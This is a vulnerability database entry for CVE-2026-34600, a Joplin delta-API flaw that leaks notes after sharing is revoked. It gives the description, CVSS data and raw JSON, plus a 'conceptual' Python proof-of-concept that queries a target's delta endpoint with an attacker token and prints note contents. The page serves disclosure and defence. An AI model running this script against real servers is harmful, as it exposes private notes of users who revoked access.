Security Vulnerability Report
中文
CVE-2026-34600 CVSS 5.7 MEDIUM

CVE-2026-34600

Published: 2026-05-19 23:16:57
Last Modified: 2026-05-20 16:16:25
Source: [email protected]

Description

Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions 3.5.2 and prior contain a logic error in the delta API that allows share recipients to download notes that are no longer shared with them, related to but not fully fixed by the prior patch in #14289. In ChangeModel.delta, when DELTA_INCLUDES_ITEMS is enabled (the default), the latest state of items is attached to delta output without verifying that those items are still shared with the requesting user, and the existing removal logic only filters items deleted for all users. Additionally, the change compression logic incorrectly reduces create - delete to NOOP, which is unsafe because compression is applied per page and an item can have multiple create events; if an earlier create falls on a separate page from a later create -> delete pair, the deletion is dropped and the sequence collapses to a create. As a result, the delta API returns a create event for a deleted item with the full latest content attached, exposing notes the user no longer has access to. This issue has been fixed in version 3.5.3.

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Joplin <= 3.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # Conceptual Proof of Concept for CVE-2026-34600 # This script demonstrates how an attacker might exploit the delta API logic error # to retrieve note content that is no longer shared with them. TARGET_URL = "https://target-joplin-instance.com" API_ENDPOINT = f"{TARGET_URL}/api/delta" SESSION_TOKEN = "<attacker_session_token>" # Low-privileged user token headers = { "Authorization": f"Bearer {SESSION_TOKEN}", "Content-Type": "application/json" } # Step 1: Request delta updates # The vulnerability relies on the server including items in the delta response # without verifying if the sharing permission was revoked. payload = { "options": { "DELTA_INCLUDES_ITEMS": True # Trigger the vulnerable logic path } } try: print(f"[*] Requesting delta from {API_ENDPOINT}...") response = requests.post(API_ENDPOINT, headers=headers, data=json.dumps(payload)) if response.status_code == 200: data = response.json() # Step 2: Parse response for exposed notes # Check if items are present that should have been filtered out if "items" in data: print("[+] Delta response received. Analyzing items...") for item in data["items"]: # In a real exploit, we would look for specific Note IDs we know were revoked print(f"[!] Found Item ID: {item.get('id')}") print(f" Title: {item.get('title')}") print(f" Body (Snippet): {item.get('body')[:50]}...") print(" [*] This data should not be accessible if sharing was revoked.") else: print("[-] No items found in delta response.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {str(e)}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34600", "sourceIdentifier": "[email protected]", "published": "2026-05-19T23:16:57.290", "lastModified": "2026-05-20T16:16:25.463", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions 3.5.2 and prior contain a logic error in the delta API that allows share recipients to download notes that are no longer shared with them, related to but not fully fixed by the prior patch in #14289. In ChangeModel.delta, when DELTA_INCLUDES_ITEMS is enabled (the default), the latest state of items is attached to delta output without verifying that those items are still shared with the requesting user, and the existing removal logic only filters items deleted for all users. Additionally, the change compression logic incorrectly reduces create - delete to NOOP, which is unsafe because compression is applied per page and an item can have multiple create events; if an earlier create falls on a separate page from a later create -> delete pair, the deletion is dropped and the sequence collapses to a create. As a result, the delta API returns a create event for a deleted item with the full latest content attached, exposing notes the user no longer has access to. This issue has been fixed in version 3.5.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-281"}, {"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/laurent22/joplin/issues/14110", "source": "[email protected]"}, {"url": "https://github.com/laurent22/joplin/pull/14289", "source": "[email protected]"}, {"url": "https://github.com/laurent22/joplin/security/advisories/GHSA-88x4-77rc-jw94", "source": "[email protected]"}, {"url": "https://github.com/laurent22/joplin/security/advisories/GHSA-88x4-77rc-jw94", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.